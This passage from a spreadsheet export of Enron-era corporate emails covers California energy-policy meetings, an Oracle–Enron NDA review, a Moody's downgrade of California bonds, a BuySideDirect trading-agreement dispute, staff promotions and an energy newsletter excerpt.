Dasovich (E-mail)'; 'Bill Booth'; 'Dorothy Rothrock'; 'Ann Cohn'; 'Jan_x000D_
Smutny-Jones'; 'John Fielder (E-mail)'; 'Barbara Barkovich'; 'Dominic_x000D_
DiMare'; 'Phil Isenberg'; 'Jack Stewart'; 'Karen Terranova'; 'Marc D._x000D_
Joseph'; 'DJ Smith'; 'Art Carter'; 'Bill Dombrowski'; 'John Redding';_x000D_
'Derek Naten'; 'John White'_x000D_
Subject: Re: REMINDER!!! -- 2:00 meeting TODAY!!!_x000D_
_x000D_
_x000D_
FYI:  I'm in committee and on conference calls, and Florio won't be here_x000D_
either, as far as I can tell.  Lenny_x000D_
----- Original Message -----_x000D_
From: Delaney Hunter &lt;dhunter@s-k-w.com&gt;_x000D_
To: 'Evelyn Kahl' &lt;ek@a-klaw.com&gt;; 'Keith McCrea' &lt;kmccrea@sablaw.com&gt;;_x000D_
'Mike Kahl' &lt;mkahl@ka-pow.com&gt;; 'Jeff Dasovich (E-mail)'_x000D_
&lt;jdasovic@enron.com&gt;; 'Bill Booth' &lt;wbooth@booth-law.com&gt;; 'Dorothy_x000D_
Rothrock' &lt;drothrock@camfg.com&gt;; 'Ann Cohn' &lt;cohnap@sce.com&gt;; 'Jan_x000D_
Smutny-Jones' &lt;smutny@iepa.com&gt;; 'John Fielder (E-mail)' &lt;fieldejr@sce.com&gt;;_x000D_
'Barbara Barkovich' &lt;brbarkovich@earthlink.net&gt;; 'Dominic DiMare'_x000D_
&lt;dominic.dimare@calchamber.com&gt;; 'Phil Isenberg' &lt;isenberg@hmot.com&gt;; 'Jack_x000D_
Folks-_x000D_
We will be meeting at 10:00 am tomorrow at the usual location. Attached is_x000D_
the most recent redline version of the document._x000D_
_x000D_
See you then_x000D_
_x000D_
Thanks!_x000D_
_x000D_
 - Draft Issues Outline 062001 (Redline 061901).doc</t>
  </si>
  <si>
    <t>Mon, 4 Feb 2002 00:37:06 -0800 (PST)</t>
  </si>
  <si>
    <t>Start Date: 2/4/02; HourAhead hour: 3;</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 2/4/02; HourAhead hour: 3;  No ancillary schedules awarded.  No variances detected._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2002020403.txt</t>
  </si>
  <si>
    <t>Mon, 25 Sep 2000 02:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>NYMEX calendars</t>
  </si>
  <si>
    <t>Stephanie and Sam need NYMEX calendars</t>
  </si>
  <si>
    <t>Thu, 16 Nov 2000 09:08:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dune.thorne@oracle.com'})</t>
  </si>
  <si>
    <t>[Fwd: [Fwd: NDA - Oracle]]</t>
  </si>
  <si>
    <t>Tana,_x000D_
I sent the CDA to our legal team and they had a few changes to make. Can_x000D_
you make these changes and send it back?_x000D_
_x000D_
Regards,_x000D_
Dune_x000D_
_x000D_
Content-Transfer-Encoding: 7bit_x000D_
Return-Path: &lt;Jane.Akdoruk@oracle.com&gt;_x000D_
Received: from oracle.com (dhcp-5op6-5op6-east-144-25-179-66.us.oracle.com _x000D_
[144.25.179.66]) by gmgw01.oraclecorp.com (8.8.8+Sun/8.8.8) with ESMTP id _x000D_
NAA02374; Mon, 13 Nov 2000 13:46:28 -0800 (PST)_x000D_
Message-ID: &lt;3A106127.A30BABDD@oracle.com&gt;_x000D_
Date: Mon, 13 Nov 2000 15:46:16 -0600_x000D_
From: Jane Akdoruk &lt;Jane.Akdoruk@oracle.com&gt;_x000D_
X-Mailer: Mozilla 4.51 [en] (Win95; U)_x000D_
X-Accept-Language: en_x000D_
MIME-Version: 1.0_x000D_
To: Dune Thorne &lt;dune.thorne@oracle.com&gt;_x000D_
Subject: Re: [Fwd: NDA - Oracle]_x000D_
References: &lt;3A0B33A7.27D1DC15@oracle.com&gt;_x000D_
Content-Type: text/plain; charset=us-ascii_x000D_
_x000D_
Dune, I've reviewed the NDA and all of their changes are acceptable, except:_x000D_
_x000D_
--  The additions to the two sentences in Section 1 don't make sense as_x000D_
written, so should be restated as follows:_x000D_
Any written Confidential Information will be clearly labeled "Confidential_x000D_
Information" or, in the absence thereof, will be deemed Confidential_x000D_
Information if it is of such nature as should be known to the receiving Party_x000D_
to be confidential.  Any Confidential Information transmitted orally will be_x000D_
clearly identified as such by the Party disclosing such information at the_x000D_
time it is disclosed or, in the absence thereof, will be deemed Confidential_x000D_
Information if it is of such nature as should be known to the receiving Party_x000D_
to be confidential._x000D_
_x000D_
--  We can't agree to the new language in Section 10._x000D_
_x000D_
Feel free to forward my comments to Enron if you would like.  I would have_x000D_
revised the CDA accordingly, but they use a different redlining system than we_x000D_
do._x000D_
_x000D_
Thanks._x000D_
_x000D_
--_x000D_
Best regards,_x000D_
_x000D_
Jane Akdoruk_x000D_
Senior Corporate Counsel_x000D_
972-409-3104 Phone_x000D_
425-699-0930 Fax_x000D_
_x000D_
_x000D_
_x000D_
Dune Thorne wrote:_x000D_
_x000D_
&gt; Jane,_x000D_
&gt; I left you a voice message regarding the attached NDA. We have been_x000D_
&gt; working on a partnership with Enron for the past few months, and the_x000D_
&gt; division of Enron that we have been talking to has moved into a_x000D_
&gt; different group within the company. The attached NDA includes the_x000D_
&gt; language of the new group. Could you review it before we sign it?_x000D_
&gt;_x000D_
&gt; Thanks for you help._x000D_
&gt;_x000D_
&gt; -Dune_x000D_
&gt;_x000D_
&gt;   ------------------------------------------------------------------------_x000D_
&gt;_x000D_
&gt; Subject: NDA - Oracle_x000D_
&gt; Date: Thu, 9 Nov 2000 17:11:22 -0600_x000D_
&gt; From: Tana.Jones@enron.com_x000D_
&gt; To: dune.thorne@oracle.com_x000D_
&gt; CC: Dovie.Keprta@enron.com_x000D_
&gt;_x000D_
&gt; Dear Mr. Dune,_x000D_
&gt;_x000D_
&gt; At the request of Dovie Keprta, I am enclosing our proposed form of_x000D_
&gt; Non-Disclosure Agreement.  I have also enclosed a blacklined draft showing_x000D_
&gt; the changes from the NDA you executed with Enron Broadband.  If the_x000D_
&gt; enclosed meets with your approval, please have an authorized officer_x000D_
&gt; execute two copies and return them to me for execution by Enron.  If you_x000D_
&gt; have any comments or questions, please do not hesitate to call me at (713)_x000D_
&gt; 853-3399._x000D_
&gt;_x000D_
&gt; (See attached file: Oracle.doc)_x000D_
&gt; (See attached file: ORACLE.RED)_x000D_
&gt;_x000D_
&gt;   ------------------------------------------------------------------------_x000D_
&gt;                         Name: Oracle.doc_x000D_
&gt;    Oracle.doc           Type: Winword File (application/msword)_x000D_
&gt;                     Encoding: base64_x000D_
&gt;              Download Status: Not downloaded with message_x000D_
&gt;_x000D_
&gt;                         Name: ORACLE.RED_x000D_
&gt;    ORACLE.RED           Type: unspecified type (application/octet-stream)_x000D_
&gt;                     Encoding: base64_x000D_
&gt;              Download Status: Not downloaded with message_x000D_
&gt;_x000D_
&gt;   ------------------------------------------------------------------------_x000D_
&gt;_x000D_
&gt;   Dune Thorne &lt;dune.thorne@oracle.com&gt;_x000D_
&gt;   Senior Manager_x000D_
&gt;   Exchange Business Development_x000D_
&gt;_x000D_
&gt;   Dune Thorne_x000D_
&gt;   Senior Manager                 &lt;dune.thorne@oracle.com&gt;_x000D_
&gt;   Exchange Business Development_x000D_
&gt;                                  Fax: (650) 506-7817_x000D_
&gt;                                  Work: (650) 607-0603_x000D_
&gt;   Additional Information:_x000D_
&gt;   Last Name     Thorne_x000D_
&gt;   First Name    Dune_x000D_
&gt;   Version       2.1_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - dune.thorne.vcf</t>
  </si>
  <si>
    <t>Tue, 15 May 2001 05:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mark.haedicke@enron.com', 'ray.alvarez@enron.com', 'alan.comnes@enron.com', 'tracy.ngo@enron.com', 'richard.sanders@enron.com', 'christian.yoder@enron.com', 'james.steffes@enron.com', 'tim.belden@enron.com', 'michael.tribolet@enron.com', 'elizabeth.sager@enron.com', 'susan.mara@enron.com', 'edward.sacks@enron.com', 'jeff.richter@enron.com', 'robert.badeer@enron.com'})</t>
  </si>
  <si>
    <t>California General Obligation Bond Rating cut to Aa2</t>
  </si>
  <si>
    <t xml:space="preserve">California's GO Rating Cut To Aa3 From Aa2 By Moody's Updated: Tuesday, May _x000D_
15, 2001 12:03 PM ET _x000D_
NEW YORK, May 15, 2001 -- Moody's has lowered the rating on $19.8 billion of _x000D_
State of California General Obligation bonds to Aa3 from Aa2. In addition, we _x000D_
have lowered the rating on $5.7 billion in lease revenue bonds from Aa3 to _x000D_
A1. _x000D_
The downgrade reflects increasing financial risks associated with the _x000D_
continuing energy crisis, as well as those related to trends in the broader _x000D_
U.S. and California economies. The recent setback in securing legislation to _x000D_
provide energy purchase bridge financing threatens to compound the risks and _x000D_
cost of the energy crisis. In addition, the newly released May Revision to _x000D_
the Governor's Budget Submission confirms the substantial revenue _x000D_
deterioration that is expected to emerge over the next eighteen months due to _x000D_
the weak high technology sector and stock market. The May Revision commences _x000D_
what is likely to be a difficult budget debate. _x000D_
Delay in External Energy Financing Will Continue to Erode State Financial _x000D_
Position _x000D_
To date, the state's general fund cash advances for power purchases total _x000D_
approximately $4 billion, and these advances are likely to grow very quickly _x000D_
in the coming months. Last week, the legislature passed a bill (Senate Bill _x000D_
31) authorizing the issuance of $13.4 billion in revenue bonds to fund future _x000D_
purchases and repay the General Fund for past advances. Unfortunately, this _x000D_
law will not go into effect until late summer, thereby scuttling the state's _x000D_
planned interim loan facility which would have provided temporary funding for _x000D_
power purchases. Importantly, the bridge financing would have begun the _x000D_
process of shifting the source of cash from the state treasury to the credit _x000D_
markets, and ultimately to ratepayers. That process is now delayed, and in _x000D_
the interim, the state treasury will continue to serve as the source of funds _x000D_
for power purchases. _x000D_
Net state power purchase advances are running at the rate of over $1 billion _x000D_
per month. Moody's estimates that the state's ending cash position will be _x000D_
approximately $10 billion at June 30, 2001, including both General Fund cash _x000D_
and internal "borrowable resources", which represents cash that can be _x000D_
borrowed by the General Fund beyond the end of the fiscal year. This estimate _x000D_
takes into account expected energy purchases through June 30th. _x000D_
In July and August, an additional $3 to $4 billion could be expended from the _x000D_
state treasury to purchase power until external financing is secured, _x000D_
bringing total General Fund advances for power purchases to almost $10 _x000D_
billion by mid-August. As a result, the state's cash reserves are likely to _x000D_
be significantly depleted by the time long-term financing can be secured. The _x000D_
experience of the early 1990s indicates that a substantial portion of _x000D_
borrowable resources serve as a source of liquidity. Nevertheless, Moody's _x000D_
still anticipates this weakened cash position will lead the state to seek _x000D_
external cash flow borrowing for the General Fund in the form of Revenue _x000D_
Anticipation Notes during 2002, reversing the trend over the last two fiscal _x000D_
years in which the State has not needed to borrow externally for seasonal _x000D_
cash flow purposes. The state is expected to release refined cash projections _x000D_
later this week. _x000D_
Although the state's liquidity position is clearly weakening, we do not view _x000D_
the state's current financial outlook as severe enough to lower the rating to _x000D_
the A range. And Senate Bill 31 protects the General Fund from future _x000D_
energy-related advances by stipulating that after November 15, 2001, the _x000D_
amounts required for short-term cash flow power purchases cannot exceed $500 _x000D_
million in the aggregate. The enacted bill further requires that such amounts _x000D_
be repaid from the Department of Water Resources Electric Power Fund within _x000D_
180 days. These provisions provide some assurances that DWR will seek rate _x000D_
increases to fund its purchases when bond proceeds have been depleted. We are _x000D_
currently assuming the state's General Fund may not be fully reimbursed by _x000D_
the proceeds of the long-term financing, as such full reimbursement would _x000D_
reduce the amount of bond proceeds available for future power purchases, and _x000D_
require DWR to seek additional rate increases during 2001. Given the lack of _x000D_
consensus as to how to distribute the cost of power between ratepayers and _x000D_
the state treasury, it is unclear whether additional rate increases during _x000D_
2001 will be politically feasible. _x000D_
May Revision Quantifies Expected Deterioration in Revenue Forecast _x000D_
As expected, the May Revision to the Governor's Fiscal 2002 Budget Submission _x000D_
revised tax revenue forecasts downward by a substantial magnitude, reflecting _x000D_
the economic and revenue effect of the weakening economic outlook compared to _x000D_
that underlying the Governor's January proposal. In particular, the weakening _x000D_
U.S. economic outlook and stock market performance, particularly in the _x000D_
technology-oriented NASDAQ market, produce major changes to the income and _x000D_
sales tax forecasts. Over the last several years, the percentage of General _x000D_
Fund revenues attributable to capital gains and stock options has grown from _x000D_
approximately 5% in fiscal 1996 to an estimated 23% in the current fiscal _x000D_
year. Based primarily on the downturn in the high technology sector, which _x000D_
relies heavily on options in compensation packages, and the sluggish _x000D_
performance of the stock market and its adverse affect on capital gains, the _x000D_
state has reduced its tax revenue estimate for the upcoming year by _x000D_
approximately $5.4 billion, including a $2.7 downward revision in the _x000D_
personal income tax. The drop in these sources of income will also temper _x000D_
growth in sales tax collections for the upcoming year. In total, the state _x000D_
now expects revenues to decline by approximately $3.2 billion year over year _x000D_
between the current fiscal year and fiscal 2002. The state has not seen year _x000D_
over year tax revenue declines since 1992. _x000D_
A number of budgetary actions taken in recent years will aid the state in _x000D_
adapting to the weaker revenue forecast. During fiscal 2001, as well as in _x000D_
the January proposal for 2002, the budget included substantial non-recurring _x000D_
spending items. As a result the base of recurring budget demands in fiscal _x000D_
2002 and beyond is lower than it otherwise would have been. The governor has _x000D_
proposed to cancel or defer some of these items, seeking to reduce General _x000D_
Fund spending by approximately $3.2 billion as compared to the January _x000D_
proposal. Spending cuts, however, do not match the revenue decline. Fiscal _x000D_
2002 spending is slated to drop by $600 million year on year, a drop of less _x000D_
than 1%, while revenues are expected to fall by 4% during the same period. _x000D_
Although the revenue forecast is relatively cautious, the target ending _x000D_
balance, at $1.8 billion, leaves little cushion for additional bad news. _x000D_
The proposed budgetary reductions, along with proposed spending levels for _x000D_
recurring items such as education, will likely lead to prolonged budget _x000D_
debate in the coming weeks. While such budget negotiations would not _x000D_
necessarily adversely affect the timing of the issuance of the long-term _x000D_
power bonds, delay could further weaken the state's fiscal position. _x000D_
Energy Crisis Compounds Uncertainty in Economic Outlook _x000D_
The energy crisis will have economic, as well as financial, consequences that _x000D_
add further uncertainty to an already complex economic outlook. The _x000D_
Governor's economic forecast calls for the economy to slow through 2002, _x000D_
taking a similar if not more slightly pessimistic view than other economists, _x000D_
including UCLA, Economy.com, and the economists surveyed by the Western Blue _x000D_
Chip. The state posted non-farm employment gains of nearly 4% in 2000, but _x000D_
the Governor's forecast expects job growth to moderate to 2.3% in 2001, and _x000D_
grow by less than 2% in 2002. Salary and wage income growth, which drives tax _x000D_
revenues, is expected to be even weaker than employment trends. The drivers _x000D_
of the forecasts include the outlook for the high technology sector, as well _x000D_
as the important housing sector. _x000D_
None of the economic forecasts explicitly quantifies the impact of the energy _x000D_
crisis. The California economy is not heavily dependent upon energy, and _x000D_
ranks lowest among states in terms of per capita electricity consumption. The _x000D_
industries that drive the California economy are not heavy users of energy _x000D_
and it is not a major cost factor for the California industry mix. However, _x000D_
uncertainty regarding cost and availability of energy and the threat of _x000D_
unreliable power going forward have already damaged the state's business _x000D_
climate, reputation, and longer-term growth prospects. In Moody's view, the _x000D_
forecasting techniques of the major economic services tend to underestimate _x000D_
the potential impact of these difficult to quantify dimensions of the energy _x000D_
crisis. _x000D_
OUTLOOK: _x000D_
Outlook Remains Negative _x000D_
At the moment, we expect that the substantial cash resources accumulated by _x000D_
the State of California during the expansion of the last decade, in _x000D_
combination with the planned long-term energy financing will enable it to _x000D_
avert the degree of fiscal damage that would call for the rating to fall to _x000D_
the A range. If a reasonably cautious balanced budget is enacted and the _x000D_
long-term energy financing completed, the state will still have reasonable _x000D_
margins of bondholder protection on its balance sheet. However, if the state _x000D_
or US economic outlook weakens further, or if the energy financing stalls, or _x000D_
if the enacted budget is only narrowly balanced, the rating could be adjusted _x000D_
further. While we expect that the state will be able to structure a viable _x000D_
long-term energy financing over the next few months, substantial obstacles _x000D_
must be overcome to meet that goal. In addition, the state will need to enact _x000D_
a balanced budget that leaves enough cushion to accommodate the remaining _x000D_
economic uncertainty not captured in its cautious revenue forecast. Given the _x000D_
recent failure to secure the supermajority necessary to enact emergency _x000D_
bridge energy financing legislation, we expect that the budget - which also _x000D_
requires a two-thirds majority vote - will also be the subject of a difficult _x000D_
debate. </t>
  </si>
  <si>
    <t>Re: CEC Siting and Natural Gas Issues</t>
  </si>
  <si>
    <t>Someone from Parquet's group is very likely to be there.  Government Affairs _x000D_
hadn't planned to intend. I can give Parquet a call and find out and make _x000D_
sure that there's good coordination with Transwestern.  Or TW can call him _x000D_
directly.  Just let me know._x000D_
_x000D_
Best,_x000D_
Jeff</t>
  </si>
  <si>
    <t>Thu, 19 Oct 2000 10:23:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'scott_bolton@enron.net', 'donald.lassere@enron.com', 'sue.nord@enron.com'})</t>
  </si>
  <si>
    <t>California Tariff</t>
  </si>
  <si>
    <t>Greetings Folks:_x000D_
_x000D_
Any chance of finalizing the California tariff Monday morning (have a call, _x000D_
say, 7:30/8:00 AM PDT)?  Let me know.  Hope all's well with all._x000D_
_x000D_
Best,_x000D_
Jeff</t>
  </si>
  <si>
    <t>Tue, 10 Oct 2000 09:18:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Reaching the PJM Manuals</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 10/10/2000 _x000D_
04:25 PM ---------------------------_x000D_
_x000D_
_x000D_
taylorci@pjm.com@pjm.com on 10/06/2000 07:58:06 AM_x000D_
Please respond to taylorci@pjm.com_x000D_
Sent by: owner-pjm-customer-info@pjm.com_x000D_
To: pjm-customer-info@risc1.pjm.com_x000D_
cc:  _x000D_
Subject: Reaching the PJM Manuals_x000D_
_x000D_
_x000D_
Message sent from the pjm-customer-info mailing list at _x000D_
pjm-customer-info@majordomo.pjm.com:_x000D_
_x000D_
_x000D_
_x000D_
PJM is currently experiencing difficulty with the on-line presentation of the_x000D_
PJM Manuals._x000D_
_x000D_
While we are resolving the problem, an alternate method of reaching the _x000D_
Manuals_x000D_
has been created. This alternate has been arranged so that requests from the _x000D_
PJM_x000D_
Web Page will automatically use this method. Resultantly, the Adobe Acrobat_x000D_
version of the PJM Manuals can still be accessed from the PJM Web Page._x000D_
_x000D_
Other methods of reaching the Manuals will not function properly. Please use_x000D_
either the PJM Web Page or the following link:_x000D_
http://www.pjm.com/manuals2/docs/index.htm._x000D_
_x000D_
_x000D_
_x000D_
Please DO NOT REPLY to this message. If you have a question for PJM Customer_x000D_
Relations and Training, please send an e-mail to custsvc@pjm.com._x000D_
_x000D_
To unsubscribe from this list, send an e-mail to majordomo@majordomo.pjm.com_x000D_
containing only the following line in the body of the e-mail:_x000D_
_x000D_
unsubscribe pjm-customer-info_x000D_
</t>
  </si>
  <si>
    <t>Tue, 22 Feb 2000 05:44:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Potential Volume list for March, 2000</t>
  </si>
  <si>
    <t>Darren:_x000D_
_x000D_
 This is potential new volume for March , 2000:_x000D_
_x000D_
 Counterparty  Meter   Volume   Mid Month Gas Daily?_x000D_
_x000D_
 Cico Oil &amp; Gas Co. TBA   2117 MMbtu per day Yes _x000D_
_x000D_
_x000D_
 This number is NOT in Vance's production estimate. This well is anticipated _x000D_
to come on the first week of March but earlier is possible._x000D_
_x000D_
_x000D_
 Please let me know if you need any additional information._x000D_
_x000D_
 Susan Smith x 33321</t>
  </si>
  <si>
    <t>Wed, 9 Feb 2000 07:37:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bill.donovan@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'claudia.gonzalez@enron.com', 'dewaine.gorham@enron.com', 'billie.akhave@enron.com', 'kim.kegley@enron.com', 'lance.mccarthy@enron.com', 'paul.foust@enron.com', 'richard.fruge@enron.com', 'arnold.otten@enron.com', 'tara.soyal@enron.com', 'fred.tan@enron.com', 'dominic.marshall@enron.com', 'epsc.warehouse@enron.com', 'gary.fitch@enron.com', 'sarah.clark@enron.com', 'james.baskin@enron.com', 'robert.castillo@enron.com', 'tracy.ramsey@enron.com', 'randy.gray@enron.com', 'julie.franco@enron.com', 'louis.allen@enron.com', 'wade.nelson@enron.com', 'dawn.fournier@enron.com', 'jose.aparicio@enron.com', 'henry.terech@enron.com', 'cheryl.slone@enron.com', 'pat.sanchez@enron.com', 'yolanda.arriaga@enron.com', 'kathryn.swatsenbarg@enron.com', 'harry.grubbs@enron.com', 'michael.hicks@enron.com', 'joe.teagle@enron.com', 'hugo.mayorga@enron.com', 'copier.repair@enron.com', 'pat.scarborough@enron.com', 'jenny.phillips@enron.com', 'ronald.fain@enron.com', 'bill.donovan@enron.com', 'bobbie.mcniel@enron.com', 'steve.dunbar@enron.com', 'christina.yepez@enron.com', 'christopher.larson@enron.com', 'tricia.despain@enron.com', 'alex.arriaga@enron.com', 'catherine.schoolar@enron.com', 'joan.richard@enron.com', 'susan.espinoza@enron.com', 'melinda.winkler@enron.com', 'joann.holloway@enron.com', 'betsy.raybon@enron.com', 'cecelia.bentz@enron.com', 'iain.russell@enron.com', 'erica.beltran@enron.com', 'ron.spell@enron.com', 'erich.zenk@enron.com', 'reggie.wilson@enron.com', 'carmen.castillo@enron.com', 'charles.upshaw@enron.com', 'rhianna.laverell@enron.com', 'mark.santikos@enron.com', 'wendy.westfaul@enron.com', 'marcia.broom@enron.com', 'juan.torres@enron.com', 'carol.brittain@enron.com', 'dolores.sustaita@enron.com', 'john.stabler@enron.com', 'alan.jones@enron.com', 'becky.dill@enron.com', 'joe.yanez@enron.com', 'deborah.bubenko@enron.com', 'randy.lord@enron.com', 'marcus.frank@enron.com', 'janelle.duree@enron.com', 'mary.oscar@enron.com', 'john.whiting@enron.com', 'ken.berryman@enron.com', 'carole.rogers@enron.com', 'robert.svehla@enron.com', 'bill.jennett@enron.com', 'ken.byrd@enron.com', 'georgeanna.hoiseth@enron.com', 'sara.davidson@enron.com', 'nina.garcia@enron.com', 'susan.bulgawicz@enron.com', 'linda.richard@enron.com', 'richard.hensch@enron.com', 'steve.woods@enron.com', 'mari.perez@enron.com', 'johnny.gonzales@enron.com', 'tiko.reynolds@enron.com', 'frank.ortiz@enron.com', 'ken.wykel@enron.com', 'patti.ucci@enron.com', 'roland.kunc@enron.com', 'elizabeth.labanowski@enron.com', 'melvin.beene@enron.com'})</t>
  </si>
  <si>
    <t>Promotions</t>
  </si>
  <si>
    <t>I am pleased to announce the following promotions for members of our _x000D_
Corporate Administrative Services Team._x000D_
_x000D_
 Steve Woods has been promoted to Director of Facilities Operations._x000D_
_x000D_
 Ronald Fain has been promoted to Chief Pilot._x000D_
_x000D_
 Alan Jones has been promoted to Project Manager - Security and Life Safety _x000D_
Systems._x000D_
_x000D_
 Denise Oscar has been promoted to Secretary I._x000D_
_x000D_
Please join me in congratulating Steve, Ron, Alan and Denise on their well _x000D_
deserved promotions._x000D_
_x000D_
_x000D_
- Bill</t>
  </si>
  <si>
    <t>Wed, 24 May 2000 02:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'melissa.jones@enron.com', 'carol.brown@enron.com', 'lucy.marshall@enron.com', 'sue.wadsworth@enron.com', 'dorothy.dalton@enron.com', 'kayla.crenshaw@enron.com'})</t>
  </si>
  <si>
    <t>Professor Bambos' Itinerary</t>
  </si>
  <si>
    <t xml:space="preserve">Hello all:_x000D_
_x000D_
Attached please find the itinerary for Professor Bambos.  If any corrections_x000D_
need to be made, please let me know._x000D_
_x000D_
Thanks and have a great day!_x000D_
_x000D_
Shirley_x000D_
3-5290_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Online Trading - Notice Language</t>
  </si>
  <si>
    <t xml:space="preserve">Sara,_x000D_
_x000D_
My understanding is that Legal has not provided feedback regarding the issue _x000D_
of notice in connection with online trading sites.    As noted in my email _x000D_
below related to the Buy Side Direct agreement:  _x000D_
_x000D_
Section 12 of the attached Subscriber Agreement appears to specify who will _x000D_
receive notice only in the case of default by Enron.  How will legal and / or _x000D_
trading receive other notices - i,e, changes to the agreement ?_x000D_
_x000D_
This issue has been outstanding for months.   When will Legal provide _x000D_
feedback on this issue ?_x000D_
_x000D_
Thanks._x000D_
_x000D_
Mike_x000D_
x39990_x000D_
_x000D_
_x000D_
--------------------- Forwarded by Mike Fowler/Corp/Enron on 12/12/2000 03:19 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Mike Fowler_x000D_
11/30/2000 09:50 AM_x000D_
To: "Peters, Jason" &lt;jasonpeters@akllp.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: Re: FW: BuySideDirect  _x000D_
_x000D_
Am I correct in assuming that Sara decided what she would like proposed in _x000D_
terms of "notice" procedures for online trading platforms ?  Section 12 of _x000D_
the attached Subscriber Agreement appears to specify who will receive notice _x000D_
only in the case of default by Enron.  How will legal and / or trading _x000D_
receive other notices - i,e, changes to the agreement ?_x000D_
_x000D_
Thanks._x000D_
_x000D_
Mike_x000D_
713-853-9990 _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Peters, Jason" &lt;jasonpeters@akllp.com&gt; on 11/30/2000 08:21:15 AM_x000D_
To: &lt;mike.fowler@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: FW: BuySideDirect_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: lisa@imarkets.com_x000D_
Sent: Friday, October 27, 2000 2:35 PM_x000D_
To: JASON PETERS_x000D_
Cc: minnich@imarkets.com_x000D_
Subject: BuySideDirect_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Dear Jason,_x000D_
_x000D_
Getting back to you on the points still outstanding on the BuySideDirect_x000D_
_x000D_
agreement._x000D_
_x000D_
4.1 d comma, not a period, on the 11th line (Change included)_x000D_
4.6 d  Addition of following language dd  (Change included)_x000D_
_x000D_
In the event that any component of a BSD executed trade is deemed_x000D_
Clearly_x000D_
Erroneous (by BuySideDirect, the NASD or any ATS or ECN through which_x000D_
BuySideDirect executes trades), the entire BSD trade, including both_x000D_
bond_x000D_
and equity components on all sides of the trade, will be cancelled._x000D_
_x000D_
5.1     Enclosed are  Broker Dealer Attachments 1 &amp; 2_x000D_
_x000D_
5.2      Modification of previous language d (Change included)_x000D_
_x000D_
After trade affirmation, BuySideDirect shall cause its clearing firm to_x000D_
be_x000D_
responsible for the clearance and settlement of all affirmed trades_x000D_
executed_x000D_
on the BuySideDirect trading system._x000D_
_x000D_
17.2   You requested the phrase, at Subscriber's election, which we have_x000D_
not_x000D_
included._x000D_
_x000D_
Consequential dd  You also requested the deletion of the term_x000D_
consequential_x000D_
from sections 6.1and 6.2.  We would like to keep the language as is in_x000D_
sections 6.1, 6.2 and 18._x000D_
_x000D_
Please give me a call if you would like to discuss the document further._x000D_
_x000D_
You can reach me at 415d369d5020.  Thanks_x000D_
_x000D_
Regards,_x000D_
_x000D_
Lisa O'Connor_x000D_
_x000D_
_x000D_
Lisa Mears O'Connor, CFA_x000D_
BuySideDirect LLC_x000D_
a subsidiary of Intelligent Markets, Inc._x000D_
415d369d5020 Phone_x000D_
415d369d5021 Fax_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - BSD BD Attachment 2.DOC_x000D_
 - BuySideDirect Attachment 1.DOC_x000D_
 - Enron BuySideDirect Subscriber Agreement Dated August 25 2000.doc_x000D_
 - Mime.822_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 7 Feb 2002 04:56:22 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
http://www.eyeforenergy.com/newsletter/newsletter_070202.html_x000D_
_x000D_
_x000D_
[IMAGE]=09[IMAGE]=09=09=09=09[IMAGE][IMAGE][IMAGE] HOME =09_x000D_
EVENTS =09ADVERTISE =09INDUSTRY DIRECTORY =09[IMAGE]=09[IMAGE]=09_x000D_
_x000D_
_x000D_
    Thursday, February 7, 2002 Issue 46   EDITORIAL  The hottest topic in t=_x000D_
he energy industry this week remains the Enron disaster...    ...with Mr. L=_x000D_
ay not showing up to testify in front of Congress, and attempting to dodge =_x000D_
a subpoena.  The Enron fallout continues to threaten not only the wholesale=_x000D_
 energy trading sector but the energy sector as a whole as companies retren=_x000D_
ch to shore up balance sheets after downgradings by the market analysts.  I=_x000D_
s Mirant's pull out in Europe and the continued French resistance to deregu=_x000D_
lation threatening to put the breaks on the developing energy trading marke=_x000D_
t in Europe or simply a bump in the road?  We'll be keeping an eye on it, a=_x000D_
nd it'll certainly be the topic of conversation at the upcoming Energy Exch=_x000D_
anges Online show in Amsterdam.   This week's briefing includes an article =_x000D_
on a developing market within the energy industry--strategic energy managem=_x000D_
ent for corporate customers.  Once large companies could count on their uti=_x000D_
lity bills to be a constant monthly amount --well no longer.  With deregula=_x000D_
tion, price spikes, the development of the wholesale trading market, energy=_x000D_
 purchasers have been forced to become savvy comparison shoppers and risk m=_x000D_
anagers all rolled into one.  Al Massey's article takes a look at what this=_x000D_
 developing market means both for the companies supplying the energy and th=_x000D_
e companies purchasing it.  In fact we think it's such an important topic f=_x000D_
or the energy sector, we'll be running a conference in Philadelphia this Ju=_x000D_
ne, Strategic Energy Management for Corporate Buyers and Suppliers.   For m=_x000D_
ore information drop our conference organizer, Meabh Quoirin a line at mquo=_x000D_
irin@eyeforenergy.com .   Our other article takes a look at some of the rec=_x000D_
ent developments in the green energy market.  There's a lot going on in thi=_x000D_
s area, and we're even shipping our journalist off on a field trip to a win=_x000D_
d farm to give us a first hand look for an upcoming briefing.   As you all =_x000D_
no doubt know, the Eyeforenergy team will be heading off to Amsterdam at th=_x000D_
e end of next week to prepare for our Weather, Emissions and Energy Trading=_x000D_
 conference extravaganza.  We're looking forward to seeing a large number o=_x000D_
